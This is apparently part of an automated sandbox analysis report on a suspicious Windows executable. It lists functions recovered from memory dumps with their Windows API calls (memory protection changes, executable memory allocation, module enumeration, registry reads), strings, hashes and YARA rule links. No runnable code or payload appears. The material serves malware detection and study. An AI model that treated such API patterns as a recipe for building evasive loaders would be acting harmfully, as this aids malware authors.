Function 004439E9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00443A13

Part of subcall function 0044389E: GetCurrentProcess.KERNEL32 ref: 004438AB
Part of subcall function 0044389E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 004438C5
Part of subcall function 0044389E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 004438FD
Part of subcall function 0044389E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 00443929

Strings

C:\Users\user\Desktop\mcsrXx9lfD.exe, xrefs: 00443A2A

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
String ID: C:\Users\user\Desktop\mcsrXx9lfD.exe
API String ID: 1620000358-4030030373
Opcode ID: 24d7dcdebfc532e6eb9573e9651a6a0912447fe57853a46ef4232d9934b98755
Instruction ID: 83c21aa6bcaee142b23cae72e83a2504b5f091910176912a7582b913a88e97fc
Opcode Fuzzy Hash: 24d7dcdebfc532e6eb9573e9651a6a0912447fe57853a46ef4232d9934b98755
Instruction Fuzzy Hash: B501F23541020AAEDF11EF68C8488AB33B8EF05709F008566F896D7221EA34DB508B54

Uniqueness

Uniqueness Score: -1.00%

Function 0044395F, Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,?), ref: 00443981
VirtualProtect.KERNEL32(?,?,?,?), ref: 004439DE

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4243d2a1fec2bf9341810387b1b1036ca12356099ff4a9fb2ddaa52155770665
Instruction ID: 6e45966280b495fa4baf2274dffddfaf46b7300e936cc41402cf8829afc7eb86
Opcode Fuzzy Hash: 4243d2a1fec2bf9341810387b1b1036ca12356099ff4a9fb2ddaa52155770665
Instruction Fuzzy Hash: 2611A7B6500604EFEB208F54C841BBA77F8EF45B15F044166E945DB291E374FE40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0078F1A8, Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\, xrefs: 0078F231
\, xrefs: 0078F301

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: \$\
API String ID: 0-164819647
Opcode ID: e23224682c7f2c1a23b306c19c7519acc29bfe6a3ce379e1fdea1b621acc16fe
Instruction ID: 8452519b00652f127bc6f1b1c853bbb4ec5a6528a9930f89cd73d5b51f2c3edb
Opcode Fuzzy Hash: e23224682c7f2c1a23b306c19c7519acc29bfe6a3ce379e1fdea1b621acc16fe
Instruction Fuzzy Hash: 9A51D131B002059FCB54EF79C8416BEBBB6EFC4324F24C53AD519DB285EB78990287A0

Uniqueness

Uniqueness Score: -1.00%

Function 00787EE8, Relevance: 1.9, Strings: 1, Instructions: 651COMMON

Download Yara Rule

Strings

a, xrefs: 00788469

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: a
API String ID: 0-3904355907
Opcode ID: 1bb5c1f22fe8d55f8cfe98142bc0650afe33cb6025177cc6aec5ed1883b16ce4
Instruction ID: a94b1e4c9b26206b2daa63ebc275a9dc80920f558909a6fff7189424cdb01181
Opcode Fuzzy Hash: 1bb5c1f22fe8d55f8cfe98142bc0650afe33cb6025177cc6aec5ed1883b16ce4
Instruction Fuzzy Hash: EC22E331F401058BDF64AF78D89426DB7A2EF95314F60482AE80ADB391DF3DDD468792

Uniqueness

Uniqueness Score: -1.00%

Function 00AF0668, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AF06A9

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ec904f89242370fcd7d55ecfb3127530d087d27cf5088b22c8c210cb5e9bb2c
Instruction ID: b80e519435343490b3c25ee4226eebb9a8cf0ec80473836117b152a4a87ee7ca
Opcode Fuzzy Hash: 2ec904f89242370fcd7d55ecfb3127530d087d27cf5088b22c8c210cb5e9bb2c
Instruction Fuzzy Hash: 1F617030A01209DBDB14EFB5D859ABEB7B2AF84345F108828E502EB295DF799D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A6500F, Relevance: 1.7, APIs: 1, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231bbdbdda82a63fdcea4e5165941af94eb907bc095d95261940d1e291412337
Instruction ID: 31a7a92809b8efd98d2a33baaaafdd7df07abc38c38310a12c3ab1651cfbd75a
Opcode Fuzzy Hash: 231bbdbdda82a63fdcea4e5165941af94eb907bc095d95261940d1e291412337
Instruction Fuzzy Hash: 326142B1C05249AFDF12CFA8D880ADDBFB1FF49304F25816AE909AB221D735A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00AF2278, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00AF238C

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c1dc07969d0424604af8ee59f3289aeee723d3f809d93011de35be227c68c365
Instruction ID: 93ca1803428ddf0d60350df2814d84d28b5b6adf0c155e68d0864c393b65b8bd
Opcode Fuzzy Hash: c1dc07969d0424604af8ee59f3289aeee723d3f809d93011de35be227c68c365
Instruction Fuzzy Hash: 954144B1D012499FDB10CFA9C484B9EBBF1BF49304F24C16AE409AB351D7799849CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A65090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A651A2

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d52dc825dac8b5e8f243c9fb9017c568191a134011907f36bd10fab8c29df91b
Instruction ID: 38d5665d7925e539d8ae6c31b752f8c5075ea753766eb58b91a21829db67c582
Opcode Fuzzy Hash: d52dc825dac8b5e8f243c9fb9017c568191a134011907f36bd10fab8c29df91b
Instruction Fuzzy Hash: B241C0B1D11309AFDF14CFA9D884ADEBBB5BF48314F24812AE819AB210D774A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF0608, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AF06A9

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0c00fc658bcb317409b3e167c7035836ffcb8490ced6439f13dab0cad52313f
Instruction ID: 58ddb50f8b2399f38f3f9d6aa74f0ccb2f988585af72eade54ef288362abdc5c
Opcode Fuzzy Hash: e0c00fc658bcb317409b3e167c7035836ffcb8490ced6439f13dab0cad52313f
Instruction Fuzzy Hash: 3D41AF30A05248DFCB15DBB8C854AEEBBB1FF85304F1484AAE105EB292D7359C05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A6779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04A67F09

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1d9c1ea9d921433cae36eb6ad015e1e3427510d6fb1ab8050b154bf40d0eecba
Instruction ID: b9532d6d2078f600cd7f11d3596921844de152bf1ba11d59db57ee3fe9f85b37
Opcode Fuzzy Hash: 1d9c1ea9d921433cae36eb6ad015e1e3427510d6fb1ab8050b154bf40d0eecba
Instruction Fuzzy Hash: DB414CB99002058FDB04CF59C448AAABBF5FF88318F148458E41AA7761D334E845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF2590, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00AF2649

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ad264b6ac4b457cdc06fff31223f027d7b080866099ede77ab1c3af51dab0987
Instruction ID: 3e5586bfec24c185ce054f974e92d06ffc10d5e2fb0e59425e6361f3d8251dd5
Opcode Fuzzy Hash: ad264b6ac4b457cdc06fff31223f027d7b080866099ede77ab1c3af51dab0987
Instruction Fuzzy Hash: 0E31DDB1D002589FCB10CFAAD884ADEBBF5FF48754F14812AE819AB310D774A905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF22D8, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00AF238C

Memory Dump Source

Source File: 00000001.00000002.947120483.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 986d889ea6f4e1b7b562acb1b79ac6bb8cba12e6fbb373750c86062b0d0172b8
Instruction ID: 89d3351b762248f81c6d59eb5d46f7c4006506ea013edabff660bed55455eba6
Opcode Fuzzy Hash: 986d889ea6f4e1b7b562acb1b79ac6bb8cba12e6fbb373750c86062b0d0172b8
Instruction Fuzzy Hash: E231F2B0D012499FDB10CF99C584A9EFBF5BF48304F24826AE409AB355C7799989CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A66B61, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A66BEF

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 651923d03eadc0b2e138ed643569a69179158278b6d645aad14b93db169f22a4
Instruction ID: 5040153e0153c72b8344254b3478858b6bfbf601c18be355a9ee1b7cae456420
Opcode Fuzzy Hash: 651923d03eadc0b2e138ed643569a69179158278b6d645aad14b93db169f22a4
Instruction Fuzzy Hash: 1821E2B5D012489FDB00CFA9E584AEEBBF4FB48324F14841AE819A3710D378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A66B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A66BEF

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e8761bcb953382fdefe5776f304c59a0a79611e2ff749b3ae097a4e4fc9ff5a6
Instruction ID: 3e3e9c3286fb0d8bf42b305f7e09959016328a51f1e85acee98cf5374a7e2bc7
Opcode Fuzzy Hash: e8761bcb953382fdefe5776f304c59a0a79611e2ff749b3ae097a4e4fc9ff5a6
Instruction Fuzzy Hash: 2D21E2B5D00248AFDB10CFA9D884ADEBBF8FB48320F14841AE815A3710D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A6BE89, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04A6BF12

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 1495bedd25a6d1cbcd74dc4712737ad18b81cbac3df184175715f299ac8ce422
Instruction ID: 6648a803354789a3e98d9d858b36c8db63ab09828105239f728a0be46659b52f
Opcode Fuzzy Hash: 1495bedd25a6d1cbcd74dc4712737ad18b81cbac3df184175715f299ac8ce422
Instruction Fuzzy Hash: F5218C719013558FEB10DFA8D94979EBBF4FB05314F14852AD40AF7681D738A514CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A6BE98, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04A6BF12

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f198b0f24db91222f8a1d8323421ff0ead2820c1174edbe959afcaf9dca7ef10
Instruction ID: b1cea9145968fffb6c82131dcde41b0e35cddbaef7aafeb7cb760e5f9ecd3dd8
Opcode Fuzzy Hash: f198b0f24db91222f8a1d8323421ff0ead2820c1174edbe959afcaf9dca7ef10
Instruction Fuzzy Hash: 8A119A709013158FEB20CFA8D80879EBBF4FB09314F108529D40AF7680CB39A914CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A63300, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 04A64116

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 62ce30048635c5efd93020c547e86ca3acfa95236c989c5eb66a72b226793324
Instruction ID: bf838be08906c0bb9bde29250d02dfdba872bfa8d3064ae398419a07b1a1cc5a
Opcode Fuzzy Hash: 62ce30048635c5efd93020c547e86ca3acfa95236c989c5eb66a72b226793324
Instruction Fuzzy Hash: AD1132B1C002598FEB10CF9AD444BDEFBF4EB89314F10842AD82AB7600D379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04A640AA, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 04A64116

Memory Dump Source

Source File: 00000001.00000002.949198470.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 439b6bd2971a34b5601c3815d38209241db34c020f9a9f66612b89c2359ee8ad
Instruction ID: 882f46c6965d80a1587d1845d8c6fe63337dabf57828264bff3b66a9a4627cb2
Opcode Fuzzy Hash: 439b6bd2971a34b5601c3815d38209241db34c020f9a9f66612b89c2359ee8ad
Instruction Fuzzy Hash: 66110FB6C002598FDB10CF9AD444BDEFBF4EB88314F11842AC82AB7610D379A549CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004440B9, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 004440E5

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e9e84feaad51608a42d43326355def0c8c1e24503f349c6970b18c65e650c909
Instruction ID: 911a4332be994ffb82aee0ccdca0de803eb050814c98b7b337b8dc0d6e4bf6bf
Opcode Fuzzy Hash: e9e84feaad51608a42d43326355def0c8c1e24503f349c6970b18c65e650c909
Instruction Fuzzy Hash: C1D017674029262636153A6AAC079DF635C9D03B7A724402BF6009A581DF5DEFA281FE

Uniqueness

Uniqueness Score: -1.00%

Function 0043E12C, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0043E141

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d9fbb2d3914cc50f8980dacef1ca5a582dc24b60bff064f81c93ed11ffd8493e
Instruction ID: df68df2a11ec2746f8aff990c1c95b6fd8241f3f54ed457bd746f88e9048ba75
Opcode Fuzzy Hash: d9fbb2d3914cc50f8980dacef1ca5a582dc24b60bff064f81c93ed11ffd8493e
Instruction Fuzzy Hash: 3BD05E7A550B045EEB109F756C09B673BDC9785395F10843AB90DC6290F574C980D948

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF47, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 0043EF49

Part of subcall function 0043EED5: TlsGetValue.KERNEL32(00000000,?,0043EF4E,00000000,00440256,00448120,00000000,00000314,?,0043E603,00448120,Microsoft Visual C++ Runtime Library,00012010), ref: 0043EEE7
Part of subcall function 0043EED5: TlsGetValue.KERNEL32(00000005,?,0043EF4E,00000000,00440256,00448120,00000000,00000314,?,0043E603,00448120,Microsoft Visual C++ Runtime Library,00012010), ref: 0043EEFE
Part of subcall function 0043EED5: RtlEncodePointer.NTDLL(00000000,?,0043EF4E,00000000,00440256,00448120,00000000,00000314,?,0043E603,00448120,Microsoft Visual C++ Runtime Library,00012010), ref: 0043EF3C

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: ccbc28606bd649a66c80fcdcdf531e41ef5784dca38b2f4c12c1bbe5356bd757
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00780CB0, Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

xk, xrefs: 00781494

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: xk
API String ID: 0-664891089
Opcode ID: 0e7b1c9fc061c4aaff2df203cf82b59a2013d0c2e448952d34e848f0cb3dfeb7
Instruction ID: 770382503b271376343ca4c1ef28211c6ae23543192a2cff87ce658557745309
Opcode Fuzzy Hash: 0e7b1c9fc061c4aaff2df203cf82b59a2013d0c2e448952d34e848f0cb3dfeb7
Instruction Fuzzy Hash: 60A1DF30A44249DFCF15DFA4C844ADEBFB2FF89310F148156E905AB3A5D738A859CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00789EE8, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

P@$k, xrefs: 00789F5F

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: P@$k
API String ID: 0-2975532040
Opcode ID: 12917707196db5d7f6b8471f3c0335027c7bf544105aea65fb16e3ae260f8c6d
Instruction ID: c7df521ce302493bc7be1eaf59ad750d6f545c2c63865b7d4a40067e383221fd
Opcode Fuzzy Hash: 12917707196db5d7f6b8471f3c0335027c7bf544105aea65fb16e3ae260f8c6d
Instruction Fuzzy Hash: B631CF31F401049FCB08AB74C4646AEB7E7AFC8344B148829D506EB791EF399D42CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00789EE4, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

P@$k, xrefs: 00789F5F

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: P@$k
API String ID: 0-2975532040
Opcode ID: 4d0fcf8ea6bd90de4fa54b8c756b16e6c1e43069f33ef7ad972dcf16502416cc
Instruction ID: 1282605a6453fc3df3ea529a9a29c669375ce86d5071a039382d4130a676c29d
Opcode Fuzzy Hash: 4d0fcf8ea6bd90de4fa54b8c756b16e6c1e43069f33ef7ad972dcf16502416cc
Instruction Fuzzy Hash: 8331DE31F401049FCB08AB74D4556BEBBE6AF88344B148829D506EB791EF399D41CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00443F82, Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00443FAD

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c63f5f9c519448c9b4502ad6fe4e1684621ea1b99995eb73b00937064817e4dd
Instruction ID: 6d16a52211387e8614691a1310542f412d2a5ad0cf9c6058422a793840b2d569
Opcode Fuzzy Hash: c63f5f9c519448c9b4502ad6fe4e1684621ea1b99995eb73b00937064817e4dd
Instruction Fuzzy Hash: AE21C372A00304ABDB20DFA9DD85B5AF7F4BF44709F04442AE706D7242D678ED54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00443ED9, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443F04

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a366665bc09121a12c04a674e7517c7ecd1108c38bdd83c10e416d4513506fa5
Instruction ID: e012f55a0aa6be028a3e52b19a6c1c74b603d043471f0bd0c92ab9eed74669f4
Opcode Fuzzy Hash: a366665bc09121a12c04a674e7517c7ecd1108c38bdd83c10e416d4513506fa5
Instruction Fuzzy Hash: 88119372E00704EBDB109FA9CC85B9AB7F4EF04709F04446AE645D7242D778EE59CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004440F0, Relevance: 1.3, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 004440FA

Part of subcall function 0044346C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 00443493
Part of subcall function 0044346C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 004434BA
Part of subcall function 0044346C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 004434C0
Part of subcall function 0044346C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004434C7

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
String ID:
API String ID: 2900862000-0
Opcode ID: a92e37b583c746b01cf2cfbae83f948acf09723dcf31bfc3c51381dcd34caf92
Instruction ID: 374387c04c1fbdebf4255310a79857dc14e24ee7ecc82d0d22f5cc06d685e446
Opcode Fuzzy Hash: a92e37b583c746b01cf2cfbae83f948acf09723dcf31bfc3c51381dcd34caf92
Instruction Fuzzy Hash: 72F0ED3A800104EFEB109B09ED46A5EB3F8EB9632AF20447BE44563262C775AD408A98

Uniqueness

Uniqueness Score: -1.00%

Function 007874B8, Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

\k, xrefs: 007874DF

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: \k
API String ID: 0-1520239229
Opcode ID: 1288acb93aa28e72f351dce21ad3cafcadf86531f270f12edeac1c4a375c5315
Instruction ID: 5822e562954d632c8ae4eefb3062839b7eaa2f3bef693b2180df75541fe3afe9
Opcode Fuzzy Hash: 1288acb93aa28e72f351dce21ad3cafcadf86531f270f12edeac1c4a375c5315
Instruction Fuzzy Hash: A4E0C2223893461BE788A17D9881B3AB9CADBC0264B28C175A80DC7682D828DC099366

Uniqueness

Uniqueness Score: -1.00%

Function 0078DA07, Relevance: .8, Instructions: 776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3e75867e25d3ef1bb2b06f4ea990630efd9329009823d43e37b97337d2322e
Instruction ID: 574e40ff4b92ceb97e504bf6457940775cf6c48d4ca9b3f6a6671ff8f7d5fe19
Opcode Fuzzy Hash: 9a3e75867e25d3ef1bb2b06f4ea990630efd9329009823d43e37b97337d2322e
Instruction Fuzzy Hash: AE52C230B4A3858FE712A778C95865A7BB19B97304F2A84A7D045DF6E3DB38CC4AC711

Uniqueness

Uniqueness Score: -1.00%

Function 0078BFE0, Relevance: .7, Instructions: 685COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c94f7b5b59bfcec370cda827acbb041155362382ec915abaeb72db5d4ef430b
Instruction ID: 6a1cf05d9d9e5c868c0a50c38cbd45e3df0bf16b8fc42ff0e17177f12125e2e3
Opcode Fuzzy Hash: 0c94f7b5b59bfcec370cda827acbb041155362382ec915abaeb72db5d4ef430b
Instruction Fuzzy Hash: D1328E30B403058FDB05EBB4D8556AEB7B6AF85304F208569D806DB3A5EF78DC46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0078ADC8, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b084359f81a6a0438c7909694188aadcf5342838b0e45ac2494aac3bc89815a9
Instruction ID: 4135da0a82a035f41bcd593068c2f85d123edf7e1746d8048db667d42ca2746f
Opcode Fuzzy Hash: b084359f81a6a0438c7909694188aadcf5342838b0e45ac2494aac3bc89815a9
Instruction Fuzzy Hash: 1A424C30A40204CFDB24EB68C488AADB7F2FF89315F14896AD409DB765DB39EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0078B4C0, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1129db05de894d275d2a65c11e5ce57886edbf17457d04b437ac60767c1220f
Instruction ID: 0ceadb318ffe25124ab76befa9a3fc89f465af87ea5fe6ed06fdba1fd32911ad
Opcode Fuzzy Hash: e1129db05de894d275d2a65c11e5ce57886edbf17457d04b437ac60767c1220f
Instruction Fuzzy Hash: C6E12634A01214CFCB24EB64D458AADB7F2FF88315F14C969D40A9B764EB79AC46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007847B0, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae8e6a73116a83b8dbba54e7fab587fe95ab9e1bca2c62a072e3ce75564a0990
Instruction ID: 6598714a65667bead5c65a8a5da84c901285c6ef9cfc786cd7bbce2966fad982
Opcode Fuzzy Hash: ae8e6a73116a83b8dbba54e7fab587fe95ab9e1bca2c62a072e3ce75564a0990
Instruction Fuzzy Hash: 37D10470A002098FCB14EF68C854AAEBBF6FF85314F20846AD105DB792DB78ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0078BA80, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2f4612e1e1f55225180d50a0d77a9a9990e050cb125b531da6a6ffca533276
Instruction ID: 3c5afae1f3cfea9bebce323b6376577276a265b567df6297a9105cf3ec4ee8b6
Opcode Fuzzy Hash: ec2f4612e1e1f55225180d50a0d77a9a9990e050cb125b531da6a6ffca533276
Instruction Fuzzy Hash: FEA19630B41205AFDB04AB70D85DB6DBBA2EF84325F148525E911DB3E4DF399C46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0078A232, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e58e0571aca402399bb53e6b86d92f4222e1682863425719dfa7bea88717fd
Instruction ID: aa9b34f7880e887a3139d304d3806aec9dfbe85b38b295ead5f4cc0d88f9b630
